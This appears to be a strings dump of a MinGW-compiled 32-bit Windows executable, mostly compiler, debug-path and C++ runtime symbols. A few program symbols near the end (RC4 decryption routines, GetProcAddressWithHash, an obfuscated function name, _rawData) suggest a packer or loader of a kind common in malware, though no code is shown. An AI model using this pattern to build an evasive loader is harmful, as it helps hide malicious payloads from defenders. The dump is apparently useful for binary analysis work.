X86_TUNE_MEMORY_MISMATCH_STALL
X86_TUNE_PROLOGUE_USING_MOVE
X86_TUNE_EPILOGUE_USING_MOVE
X86_TUNE_SHIFT1
X86_TUNE_USE_FFREEP
X86_TUNE_INTER_UNIT_MOVES
X86_TUNE_INTER_UNIT_CONVERSIONS
X86_TUNE_FOUR_JUMP_LIMIT
X86_TUNE_SCHEDULE
X86_TUNE_USE_BT
X86_TUNE_USE_INCDEC
X86_TUNE_PAD_RETURNS
X86_TUNE_PAD_SHORT_FUNCTION
X86_TUNE_EXT_80387_CONSTANTS
X86_TUNE_AVOID_VECTOR_DECODE
X86_TUNE_PROMOTE_HIMODE_IMUL
X86_TUNE_SLOW_IMUL_IMM32_MEM
X86_TUNE_SLOW_IMUL_IMM8
X86_TUNE_MOVE_M1_VIA_OR
X86_TUNE_NOT_UNPAIRABLE
X86_TUNE_NOT_VECTORMODE
X86_TUNE_USE_VECTOR_FP_CONVERTS
X86_TUNE_USE_VECTOR_CONVERTS
X86_TUNE_FUSE_CMP_AND_BRANCH
X86_TUNE_OPT_AGU
X86_TUNE_VECTORIZE_DOUBLE
X86_TUNE_SOFTWARE_PREFETCHING_BENEFICIAL
X86_TUNE_AVX128_OPTIMAL
X86_TUNE_REASSOC_INT_TO_PARALLEL
X86_TUNE_REASSOC_FP_TO_PARALLEL
X86_TUNE_GENERAL_REGS_SSE_SPILL
X86_TUNE_AVOID_MEM_OPND_FOR_CMOVE
X86_TUNE_LAST
ix86_arch_indices
X86_ARCH_CMOV
X86_ARCH_CMPXCHG
X86_ARCH_CMPXCHG8B
X86_ARCH_XADD
X86_ARCH_BSWAP
X86_ARCH_LAST
signed char
long long unsigned int
complex float
complex double
complex long double
__float128
__unknown__
func_ptr
__CTOR_LIST__
__DTOR_LIST__
GNU C 4.8.1 -m32 -mtune=generic -march=x86-64 -g -O2 -std=gnu99
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/misc/mingw_matherr.c
_MINGW_INSTALL_DEBUG_MATHERR
GNU C 4.8.1 -m32 -mtune=generic -march=x86-64 -g -O2 -std=gnu99
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/misc/invalid_parameter_handler.c
unsigned int
uintptr_t
wchar_t
short unsigned int
long int
long long int
sizetype
long unsigned int
unsigned char
float
signed char
short int
long long unsigned int
LONG_PTR
PVOID
PLONG
double
long double
tagCOINITBASE
COINITBASE_MULTITHREADED
VARENUM
VT_EMPTY
VT_NULL
VT_I2
VT_I4
VT_R4
VT_R8
VT_CY
VT_DATE
VT_BSTR
VT_DISPATCH
VT_ERROR
VT_BOOL
VT_VARIANT
VT_UNKNOWN
VT_DECIMAL
VT_I1
VT_UI1
VT_UI2
VT_UI4
VT_I8
VT_UI8
VT_INT
VT_UINT
VT_VOID
VT_HRESULT
VT_PTR
VT_SAFEARRAY
VT_CARRAY
VT_USERDEFINED
VT_LPSTR
VT_LPWSTR
VT_RECORD
VT_INT_PTR
VT_UINT_PTR
VT_FILETIME
VT_BLOB
VT_STREAM
VT_STORAGE
VT_STREAMED_OBJECT
VT_STORED_OBJECT
VT_BLOB_OBJECT
VT_CF
VT_CLSID
VT_VERSIONED_STREAM
VT_BSTR_BLOB
VT_VECTOR
VT_ARRAY
VT_BYREF
VT_RESERVED
VT_ILLEGAL
VT_ILLEGALMASKED
VT_TYPEMASK
mingw_get_invalid_parameter_handler
mingw_set_invalid_parameter_handler
new_handler
handler
_imp___set_invalid_parameter_handler
_imp___get_invalid_parameter_handler
mingw_getsp.S
h:\crossdev\gccmaster\build-tdm64\runtime\mingw-w64-crt
GNU AS 2.23.2
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
h:/crossdev/gccmaster/host-toolchain-tdm64/x86_64-w64-mingw32/include/psdk_inc
h:/crossdev/gccmaster/host-toolchain-tdm64/x86_64-w64-mingw32/include
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/include
crtexe.c
intrin-impl.h
_mingw.h
winnt.h
minwindef.h
basetsd.h
errhandlingapi.h
processthreadsapi.h
stdlib.h
combaseapi.h
wtypes.h
internal.h
math.h
tchar.h
ctype.h
string.h
process.h
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
h:/crossdev/gccmaster/host-toolchain-tdm64/x86_64-w64-mingw32/include
tlssup.c
_mingw.h
minwindef.h
basetsd.h
winnt.h
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
h:/crossdev/gccmaster/host-toolchain-tdm64/x86_64-w64-mingw32/include
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/include
charmax.c
combaseapi.h
wtypes.h
internal.h
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
h:/crossdev/gccmaster/host-toolchain-tdm64/x86_64-w64-mingw32/include
mingw_helpers.c
combaseapi.h
wtypes.h
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
xtxtmode.c
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
h:/crossdev/gccmaster/host-toolchain-tdm64/x86_64-w64-mingw32/include
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/include
atonexit.c
combaseapi.h
wtypes.h
stdlib.h
internal.h
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
_newmode.c
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
wildcard.c
h:/crossdev/gccmaster/host-toolchain-tdm64/x86_64-w64-mingw32/include
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/include
combaseapi.h
wtypes.h
natstart.c
internal.h
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
h:/crossdev/gccmaster/host-toolchain-tdm64/x86_64-w64-mingw32/include
crt_handler.c
winnt.h
minwindef.h
basetsd.h
errhandlingapi.h
combaseapi.h
wtypes.h
signal.h
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
cinitexe.c
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
dllargv.c
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
h:/crossdev/gccmaster/host-toolchain-tdm64/x86_64-w64-mingw32/include
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/include
merr.c
combaseapi.h
wtypes.h
internal.h
math.h
stdio.h
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
h:/crossdev/gccmaster/host-toolchain-tdm64/x86_64-w64-mingw32/include
pseudo-reloc.c
vadefs.h
_mingw.h
minwindef.h
basetsd.h
winnt.h
combaseapi.h
wtypes.h
stdio.h
<built-in>
stdlib.h
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
CRT_fp10.c
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
h:/crossdev/gccmaster/host-toolchain-tdm64/x86_64-w64-mingw32/include
gccmain.c
combaseapi.h
wtypes.h
_mingw.h
stdlib.h
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
h:/crossdev/gccmaster/host-toolchain-tdm64/x86_64-w64-mingw32/include
crt0_c.c
minwindef.h
winnt.h
winbase.h
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
h:/crossdev/gccmaster/host-toolchain-tdm64/x86_64-w64-mingw32/include
gs_support.c
winnt.h
minwindef.h
basetsd.h
stdlib.h
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
tlsmcrt.c
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
h:/crossdev/gccmaster/host-toolchain-tdm64/x86_64-w64-mingw32/include
tlsthrd.c
_mingw.h
minwindef.h
basetsd.h
winnt.h
minwinbase.h
stdlib.h
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
pseudo-reloc-list.c
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/crt
h:/crossdev/gccmaster/host-toolchain-tdm64/x86_64-w64-mingw32/include
pesect.c
_mingw.h
minwindef.h
basetsd.h
winnt.h
string.h
../../../../../../src/gcc-4.8.1/libgcc/config/i386
cygwin.S
../../../../../../src/gcc-4.8.1/libgcc
../../../../../../src/gcc-4.8.1/libgcc/../gcc/config/i386
c:/mingw64tdm/x86_64-w64-mingw32/include
unwind-sjlj.c
./gthr-default.h
unwind.inc
i386.h
./unwind.h
pthread.h
shmem.h
stdlib.h
O-=eK\
../../../../../../src/gcc-4.8.1/libgcc/../libgcc/config/i386
c:/mingw64tdm/x86_64-w64-mingw32/include
shmem-win32.c
_mingw.h
minwindef.h
winnt.h
malloc.h
string.h
../../../../../../src/gcc-4.8.1/libgcc/../gcc/config/i386
../../../../../../src/gcc-4.8.1/libgcc
i386.h
libgcc2.c
gbl-ctors.h
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/misc
mingw_matherr.c
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/misc
h:/crossdev/gccmaster/host-toolchain-tdm64/x86_64-w64-mingw32/include
invalid_parameter_handler.c
_mingw.h
basetsd.h
winnt.h
combaseapi.h
wtypes.h
h:/crossdev/src/mingw-w64-v3-svn/mingw-w64-crt/misc
mingw_getsp.S
mingw_getsp.S
Subsystem
CheckSum
SizeOfImage
BaseOfCode
SectionAlignment
MinorSubsystemVersion
DataDirectory
SizeOfStackCommit
ImageBase
SizeOfCode
MajorLinkerVersion
SizeOfHeapReserve
SizeOfInitializedData
SizeOfStackReserve
SizeOfHeapCommit
MinorLinkerVersion
__enative_startup_state
SizeOfUninitializedData
AddressOfEntryPoint
MajorSubsystemVersion
SizeOfHeaders
MajorOperatingSystemVersion
FileAlignment
NumberOfRvaAndSizes
ExceptionRecord
DllCharacteristics
MinorImageVersion
MinorOperatingSystemVersion
LoaderFlags
Win32VersionValue
MajorImageVersion
hDllHandle
lpreserved
dwReason
__enative_startup_state
ExceptionRecord
sSecInfo
ExceptionRecord
HighPart
pSection
TimeDateStamp
pNTHeader
Characteristics
pImageBase
VirtualAddress
iSection
stop_argument
cur_context
personality
this_context
context
.file
crtexe.c
_envp
_argv
_argc
_argret
.text
.data
.file
crtbegin.c
.text
.data
.file
source.cpp
.text
.data
.rdata
.file
eh_personality.cc
.text
.data
.rdata
.file
eh_exception.cc
.text
.data
.rdata
.file
class_type_info.cc
.text
.data
.file
.text
.data
.file
eh_call.cc
.text
.data
.file
eh_terminate.cc
.text
.data
.file
eh_catch.cc
.text
.data
.file
eh_globals.cc
.text
.data
.rdata
.file
eh_throw.cc
.text
.data
.file
eh_alloc.cc
.text
.data
.rdata
.ctors
.file
del_op.cc
__ZdlPv
.text
.data
.file
pure.cc
.text
.data
.rdata
.file
tinfo.cc
.text
.data
.file
eh_term_handler.cc
.text
.data
.rdata
.file
eh_unex_handler.cc
.text
.data
.rdata
.file
vterminate.cc
.text
.data
.rdata
.file
eh_type.cc
.text
.data
.file
cp-demangle.c
_d_name
_d_type
.text
.data
.rdata
.file
tlssup.c
___xd_a
___xd_z
.text
.data
.CRT$XLD$
.CRT$XLC
.rdata
.CRT$XDZ4
.CRT$XDA0
.CRT$XLZ,
.file
charmax.c
.text
.data
.file
mingw_helpers.c
.text
.data
.file
xtxtmode.c
.text
.data
.file
atonexit.c
_atexit
.text
.data
.file
_newmode.c
.text
.data
.file
wildcard.c
.text
.data
.file
natstart.c
.text
.data
.file
crt_handler.c
.text
.data
.file
cinitexe.c
.text
.data
.CRT$XCA
.file
dllargv.c
.text
.data
.file
merr.c
.text
.data
.rdata
.file
pseudo-reloc.c
.text
.data
.rdata
.file
CRT_fp10.c
.text
.data
.file
gccmain.c
___main
.text
.data
.file
crt0_c.c
_main
.text
.data
.file
gs_support.c
.text
.data
.rdata
.file
tlsmcrt.c
.text
.data
.file
tlsthrd.c
.text
.data
.file
.text
.data
.file
pesect.c
.text
.data
.file
.text
.data
.file
unwind-sjlj.c
.text
.data
.rdata
.file
shmem-win32.c
.text
.data
.file
libgcc2.c
.text
.data
.file
mingw_matherr.c
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.file
.text
.data
.text
.data
.text
.data
.text
.data
.idata$4
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.idata$5
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.file
hname
fthunk
.text
.data
.idata$2P
.file
.text
.data
.file
thread.c
.text
.data
.rdata
.CRT$XLF(
.file
mutex.c
.text
.data
.rdata
.file
shmem.c
.text
.data
.file
spinlock.c
.text
.data
.rdata
.file
rwlock.c
.text
.data
.rdata
.file
misc.c
.text
.data
.file
cond.c
.text
.data
.rdata
.file
hname
fthunk
.text
.data
.idata$2(
.file
.text
.data
.file
hname
fthunk
.text
.data
.file
.text
.data
.file
hname
fthunk
.text
.data
.idata$2
.file
.text
.data
.file
hname
fthunk
.text
.data
.idata$2d
.file
.text
.data
.text
.data
.idata$4
.text
.data
.idata$5
.text
.data
.text
.data
.text
.data
.file
hname
fthunk
.text
.data
.idata$2<
.file
.text
.data
.file
mingw_getsp.S
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.file
crtend.c
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.idata$7
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.idata$7
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.text
.data
.idata$7
.text
.data
.text
.data
.text
.data
.text
.data
.rdata
.rsrc
__cexit
___xi_a
_free
_strcmp
___xl_c
___xl_f
___xl_z
_fputc
_fputs
__ftime
__dll__
_fwrite
___xc_a
_memcpy
_memset
___xl_a
___xl_d
_fopen
_calloc
__fmode
__lock
___xc_z
__end__
_rawData
_signal
_malloc
_fclose
_memcmp
_abort
___xi_z
_write
_strlen
_exit
_printf
_Sleep@4
.debug_aranges
.debug_info
.debug_abbrev
.debug_line
.debug_frame
.debug_str
.debug_loc
.debug_ranges
___mingw_invalidParameterHandler
_pre_c_init
_managedapp
_pre_cpp_init
_startinfo
___tmainCRTStartup
_has_cctor
_WinMainCRTStartup
_mainCRTStartup
.CRT$XCAA
.CRT$XIAA
.debug_info
.debug_abbrev
.debug_loc
.debug_aranges
.debug_ranges
.debug_line
.debug_str
.rdata$zzz
.debug_frame
___readfsdword
__Z5crc32Ph
__Z11RC4_set_keyP10rc4_key_stiPKh
__Z3RC4P10rc4_key_stjPKhPh
__Z10encode_rc4PcmPw
__Z8_wstrlenPw
__Z22GetProcAddressWithHashm
__Z18_Crypt_DecryptDataPhmS_
__Z19xxDFadwetagcvFFbnMIv
__Z10WindowProcP6HWND__jjl@16
__Z14WndTestDlgProcP6HWND__jjl@16
__ZZ14WndTestDlgProcP6HWND__jjlE15BackgroundColor
__ZZ14WndTestDlgProcP6HWND__jjlE12CustomColors
__ZZ14WndTestDlgProcP6HWND__jjlE5Color
_WinMain@16
.gcc_except_table
__ZL12read_sleb128PKhPl
__ZL16get_adjusted_ptrPKSt9type_infoS1_PPv
__ZL28read_encoded_value_with_basehjPKhPj
__ZL15get_ttype_entryP16lsda_header_infom
__ZL20check_exception_specP16lsda_header_infoPKSt9type_infoPvl
__ZL21base_of_encoded_valuehP15_Unwind_Context
__ZL17parse_lsda_headerP15_Unwind_ContextPKhP16lsda_header_info
___gxx_personality_sj0
.rdata$_ZTIN10__cxxabiv115__forced_unwindE
.rdata$_ZTIN10__cxxabiv119__foreign_exceptionE
___cxa_call_unexpected
.rdata$_ZTISt13bad_exception
.rdata$_ZTSN10__cxxabiv115__forced_unwindE
.rdata$_ZTISt9exception
.rdata$_ZTSSt9exception
.rdata$_ZTSSt13bad_exception
.rdata$_ZTSN10__cxxabiv119__foreign_exceptionE
.text$_ZL12read_sleb128PKhPl
.text$_ZL16get_adjusted_ptrPKSt9type_infoS1_PPv
.text$_ZL28read_encoded_value_with_basehjPKhPj
.text$_ZL15get_ttype_entryP16lsda_header_infom
.text$_ZL20check_exception_specP16lsda_header_infoPKSt9type_infoPvl
.text$_ZL21base_of_encoded_valuehP15_Unwind_Context
.text$_ZL17parse_lsda_headerP15_Unwind_ContextPKhP16lsda_header_info
.text$__gxx_personality_sj0
.text$__cxa_call_unexpected
__ZNSt9exceptionD2Ev
.rdata$_ZTVSt9exception
__ZNSt9exceptionD1Ev
__ZNSt13bad_exceptionD2Ev
__ZNSt13bad_exceptionD1Ev
__ZN10__cxxabiv115__forced_unwindD2Ev
.rdata$_ZTVN10__cxxabiv115__forced_unwindE
__ZN10__cxxabiv115__forced_unwindD1Ev
__ZN10__cxxabiv119__foreign_exceptionD2Ev
.rdata$_ZTVN10__cxxabiv119__foreign_exceptionE
__ZN10__cxxabiv119__foreign_exceptionD1Ev
__ZNKSt9exception4whatEv
__ZNKSt13bad_exception4whatEv
__ZNSt9exceptionD0Ev
__ZNSt13bad_exceptionD0Ev
__ZN10__cxxabiv115__forced_unwindD0Ev
__ZN10__cxxabiv119__foreign_exceptionD0Ev
.rdata$_ZTVSt13bad_exception
.text$_ZNSt9exceptionD2Ev
.text$_ZNSt13bad_exceptionD2Ev
.text$_ZN10__cxxabiv115__forced_unwindD2Ev
.text$_ZN10__cxxabiv119__foreign_exceptionD2Ev
.text$_ZNKSt9exception4whatEv
.text$_ZNKSt13bad_exception4whatEv
.text$_ZNSt9exceptionD0Ev
.text$_ZNSt13bad_exceptionD0Ev
.text$_ZN10__cxxabiv115__forced_unwindD0Ev
.text$_ZN10__cxxabiv119__foreign_exceptionD0Ev
__ZNK10__cxxabiv117__class_type_info11__do_upcastEPKS0_PPv
__ZNK10__cxxabiv117__class_type_info20__do_find_public_srcEiPKvPKS0_S2_
__ZN10__cxxabiv117__class_type_infoD2Ev
.rdata$_ZTVN10__cxxabiv117__class_type_infoE
__ZN10__cxxabiv117__class_type_infoD1Ev
__ZN10__cxxabiv117__class_type_infoD0Ev
__ZNK10__cxxabiv117__class_type_info11__do_upcastEPKS0_PKvRNS0_15__upcast_resultE
__ZNK10__cxxabiv117__class_type_info10__do_catchEPKSt9type_infoPPvj
__ZNK10__cxxabiv117__class_type_info12__do_dyncastEiNS0_10__sub_kindEPKS0_PKvS3_S5_RNS0_16__dyncast_resultE
.rdata$_ZTISt9type_info
.rdata$_ZTSSt9type_info
.rdata$_ZTSN10__cxxabiv117__class_type_infoE
.rdata$_ZTIN10__cxxabiv117__class_type_infoE
.text$_ZNK10__cxxabiv117__class_type_info11__do_upcastEPKS0_PPv
.text$_ZNK10__cxxabiv117__class_type_info20__do_find_public_srcEiPKvPKS0_S2_
.text$_ZN10__cxxabiv117__class_type_infoD2Ev
.text$_ZN10__cxxabiv117__class_type_infoD0Ev
.text$_ZNK10__cxxabiv117__class_type_info11__do_upcastEPKS0_PKvRNS0_15__upcast_resultE
.text$_ZNK10__cxxabiv117__class_type_info10__do_catchEPKSt9type_infoPPvj
.text$_ZNK10__cxxabiv117__class_type_info12__do_dyncastEiNS0_10__sub_kindEPKS0_PKvS3_S5_RNS0_16__dyncast_resultE
__ZN10__cxxabiv120__si_class_type_infoD2Ev
.rdata$_ZTVN10__cxxabiv120__si_class_type_infoE
__ZN10__cxxabiv120__si_class_type_infoD1Ev
__ZN10__cxxabiv120__si_class_type_infoD0Ev
__ZNK10__cxxabiv120__si_class_type_info20__do_find_public_srcEiPKvPKNS_17__class_type_infoES2_
__ZNK10__cxxabiv120__si_class_type_info12__do_dyncastEiNS_17__class_type_info10__sub_kindEPKS1_PKvS4_S6_RNS1_16__dyncast_resultE
__ZNK10__cxxabiv120__si_class_type_info11__do_upcastEPKNS_17__class_type_infoEPKvRNS1_15__upcast_resultE
.rdata$_ZTSN10__cxxabiv120__si_class_type_infoE
.rdata$_ZTIN10__cxxabiv120__si_class_type_infoE
.text$_ZN10__cxxabiv120__si_class_type_infoD2Ev
.text$_ZN10__cxxabiv120__si_class_type_infoD0Ev
.text$_ZNK10__cxxabiv120__si_class_type_info20__do_find_public_srcEiPKvPKNS_17__class_type_infoES2_
.text$_ZNK10__cxxabiv120__si_class_type_info12__do_dyncastEiNS_17__class_type_info10__sub_kindEPKS1_PKvS4_S6_RNS1_16__dyncast_resultE
.text$_ZNK10__cxxabiv120__si_class_type_info11__do_upcastEPKNS_17__class_type_infoEPKvRNS1_15__upcast_resultE
si_class_type_info.cc
___cxa_call_terminate
.text$__cxa_call_terminate
__ZN10__cxxabiv111__terminateEPFvvE
__ZSt9terminatev
__ZN10__cxxabiv112__unexpectedEPFvvE
__ZSt10unexpectedv
__ZSt13set_terminatePFvvE
__ZSt14set_unexpectedPFvvE
.text$_ZN10__cxxabiv111__terminateEPFvvE
.text$_ZSt9terminatev
.text$_ZN10__cxxabiv112__unexpectedEPFvvE
.text$_ZSt10unexpectedv
.text$_ZSt13set_terminatePFvvE
.text$_ZSt14set_unexpectedPFvvE
___cxa_get_exception_ptr
___cxa_begin_catch
___cxa_end_catch
__ZSt18uncaught_exceptionv
.text$__cxa_get_exception_ptr
.text$__cxa_begin_catch
.text$__cxa_end_catch
.text$_ZSt18uncaught_exceptionv
__ZL15eh_globals_dtorPv
___shmem_init_init
__Z26__shmem_grabber_eh_globalsv
__Z20__shmem_grabber_initv
___cxa_get_globals_fast
___cxa_get_globals
.text$_ZL15eh_globals_dtorPv
.text$__shmem_init_init
.text$_Z26__shmem_grabber_eh_globalsv
.text$_Z20__shmem_grabber_initv
.text$__cxa_get_globals_fast
.text$__cxa_get_globals
.data$__shmem_ptr_init
.data$__shmem_ptr_eh_globals
__ZL23__gxx_exception_cleanup19_Unwind_Reason_CodeP17_Unwind_Exception
___cxa_throw
___cxa_rethrow
.text$_ZL23__gxx_exception_cleanup19_Unwind_Reason_CodeP17_Unwind_Exception
.text$__cxa_throw
.text$__cxa_rethrow
.text$_ZNK9__gnu_cxx24__concurrence_lock_error4whatEv
__ZNK9__gnu_cxx24__concurrence_lock_error4whatEv
.text$_ZNK9__gnu_cxx26__concurrence_unlock_error4whatEv
__ZNK9__gnu_cxx26__concurrence_unlock_error4whatEv
.text$_ZN9__gnu_cxx26__concurrence_unlock_errorD1Ev
__ZN9__gnu_cxx26__concurrence_unlock_errorD1Ev
.rdata$_ZTVN9__gnu_cxx26__concurrence_unlock_errorE
.text$_ZN9__gnu_cxx24__concurrence_lock_errorD1Ev
__ZN9__gnu_cxx24__concurrence_lock_errorD1Ev
.rdata$_ZTVN9__gnu_cxx24__concurrence_lock_errorE
.text$_ZN9__gnu_cxx26__concurrence_unlock_errorD0Ev
__ZN9__gnu_cxx26__concurrence_unlock_errorD0Ev
.text$_ZN9__gnu_cxx24__concurrence_lock_errorD0Ev
__ZN9__gnu_cxx24__concurrence_lock_errorD0Ev
.text$_ZN9__gnu_cxx30__throw_concurrence_lock_errorEv
__ZN9__gnu_cxx30__throw_concurrence_lock_errorEv
.rdata$_ZTIN9__gnu_cxx24__concurrence_lock_errorE
.text$_ZN9__gnu_cxx32__throw_concurrence_unlock_errorEv
__ZN9__gnu_cxx32__throw_concurrence_unlock_errorEv
.rdata$_ZTIN9__gnu_cxx26__concurrence_unlock_errorE
__ZN12_GLOBAL__N_115emergency_mutexE
__ZL14emergency_used
__ZL16emergency_buffer
___cxa_free_exception
___cxa_allocate_dependent_exception
__ZL15dependents_used
__ZL17dependents_buffer
___cxa_free_dependent_exception
__GLOBAL__sub_I___cxa_allocate_exception
.rdata$_ZTSN9__gnu_cxx24__concurrence_lock_errorE
.rdata$_ZTSN9__gnu_cxx26__concurrence_unlock_errorE
___cxa_allocate_exception
.text$__cxa_allocate_exception
.text$__cxa_free_exception
.text$__cxa_allocate_dependent_exception
.text$__cxa_free_dependent_exception
.text.startup._GLOBAL__sub_I___cxa_allocate_exception
.data$_ZN12_GLOBAL__N_115emergency_mutexE
.data$_ZL15dependents_used
.data$_ZL17dependents_buffer
.data$_ZL14emergency_used
.data$_ZL16emergency_buffer
.text$_ZdlPv
___cxa_pure_virtual
___cxa_deleted_virtual
.text$__cxa_pure_virtual
.text$__cxa_deleted_virtual
__ZNSt9type_infoD2Ev
.rdata$_ZTVSt9type_info
__ZNSt9type_infoD1Ev
__ZNKSt9type_info14__is_pointer_pEv
__ZNKSt9type_info15__is_function_pEv
__ZNKSt9type_info11__do_upcastEPKN10__cxxabiv117__class_type_infoEPPv
__ZNSt9type_infoD0Ev
__ZNKSt9type_infoeqERKS_
__ZNKSt9type_info10__do_catchEPKS_PPvj
.text$_ZNSt9type_infoD2Ev
.text$_ZNKSt9type_info14__is_pointer_pEv
.text$_ZNKSt9type_info15__is_function_pEv
.text$_ZNKSt9type_info11__do_upcastEPKN10__cxxabiv117__class_type_infoEPPv
.text$_ZNSt9type_infoD0Ev
.text$_ZNKSt9type_infoeqERKS_
.text$_ZNKSt9type_info10__do_catchEPKS_PPvj
___shmem_init___terminate_handler_sh
__ZN10__cxxabiv138__shmem_grabber___terminate_handler_shEv
.text$__shmem_init___terminate_handler_sh
.text$_ZN10__cxxabiv138__shmem_grabber___terminate_handler_shEv
.data$_ZN10__cxxabiv134__shmem_ptr___terminate_handler_shE
___shmem_init___unexpected_handler_sh
__ZN10__cxxabiv139__shmem_grabber___unexpected_handler_shEv
.text$__shmem_init___unexpected_handler_sh
.text$_ZN10__cxxabiv139__shmem_grabber___unexpected_handler_shEv
.data$_ZN10__cxxabiv135__shmem_ptr___unexpected_handler_shE
__ZN9__gnu_cxx27__verbose_terminate_handlerEv
__ZZN9__gnu_cxx27__verbose_terminate_handlerEvE11terminating
.text$_ZN9__gnu_cxx27__verbose_terminate_handlerEv
.data$_ZZN9__gnu_cxx27__verbose_terminate_handlerEvE11terminating
___cxa_current_exception_type
.text$__cxa_current_exception_type
_d_make_comp
_d_make_name
_d_cv_qualifiers
_d_ref_qualifier
_d_clone_suffix
_d_substitution
_standard_subs
_d_append_char
_d_number.isra.0
_d_number_component
_d_compact_number
_d_template_param
_d_discriminator
_d_source_name
_d_call_offset
_d_lookup_template_argument.isra.6
_d_find_pack
_d_growable_string_callback_adapter
_d_expr_primary
_d_template_args
_cplus_demangle_builtin_types
_d_parmlist
_d_bare_function_type
_d_encoding
_d_operator_name
_cplus_demangle_operators
_d_unqualified_name
_d_expression
_d_exprlist
_d_append_string
_d_print_comp.part.10
_d_print_comp
_d_print_mod
_d_print_mod_list
_d_print_array_type.isra.9
_d_print_function_type.isra.11
_d_print_cast.isra.12
_d_print_expr_op
_d_print_subexpr
_d_demangle_callback.constprop.16
___cxa_demangle
___gcclibcxx_demangle_callback
___dyn_tls_dtor@12
___dyn_tls_init@12
___tlregdtor
_my_lconv_init
__decode_pointer
__encode_pointer
_mingw_onexit
__gnu_exception_handler@4
__setargv
___mingw_raise_matherr
_stUserMathErr
___mingw_setusermatherr
__matherr
_CSWTCH.5
___report_error
___write_memory.part.0
_maxSections
_the_secs
__pei386_runtime_relocator
_was_init.60223
__fpreset
___do_global_dtors
___do_global_ctors
_initialized
.text.startup
___security_init_cookie
.data$__security_cookie
.data$__security_cookie_complement
___report_gsfailure
_GS_ContextRecord
_GS_ExceptionRecord
_GS_ExceptionPointers
___mingwthr_run_key_dtors.part.0
___mingwthr_cs
_key_dtor_list
____w64_mingwthr_add_key_dtor
___mingwthr_cs_init
____w64_mingwthr_remove_key_dtor
___mingw_TLScallback
pseudo-reloc-list.c
__ValidateImageBase.part.0
__ValidateImageBase
__FindPESection
__FindPESectionByName
___mingw_GetSectionForAddress
___mingw_GetSectionCount
__FindPESectionExec
__GetPEImageBase
__IsNonwritableInCurrentImage
___mingw_enum_import_library_names
___shmem_init_use_fc_key
___shmem_init_sjlj_once
_fc_key_init
__Unwind_RaiseException_Phase2
_fc_key_init_once
_uw_install_context.isra.3
__Unwind_ForcedUnwind_Phase2
___shmem_grabber_fc_static
___shmem_grabber_fc_key
___shmem_grabber_use_fc_key
___shmem_grabber_sjlj_once
__Unwind_SjLj_Register
__Unwind_SjLj_Unregister
__Unwind_GetGR
__Unwind_GetCFA
__Unwind_SetGR
__Unwind_GetIP
__Unwind_GetIPInfo
__Unwind_SetIP
__Unwind_GetLanguageSpecificData
__Unwind_GetRegionStart
__Unwind_FindEnclosingFunction
__Unwind_GetDataRelBase
__Unwind_GetTextRelBase
__Unwind_SjLj_RaiseException
__Unwind_SjLj_ForcedUnwind
__Unwind_SjLj_Resume
__Unwind_SjLj_Resume_or_Rethrow
__Unwind_DeleteException
__Unwind_Backtrace
_get_ptr_from_atom
___shmem_grab
_mingw_get_invalid_parameter_handler
_mingw_set_invalid_parameter_handler
invalid_parameter_handler.c
___shmem_winpthreads_init__pthread_tls_shmem
___shmem_winpthreads_init__pthread_key_lock_shmem
___shmem_winpthreads_init_mtx_pthr_locked_shmem
___shmem_winpthreads_init_once_global_shmem
_once_global_shmem_init
___pthread_get_pointer
_enterOnceObject
_leaveOnceObject
__pthread_once_cleanup
___pthread_register_pointer
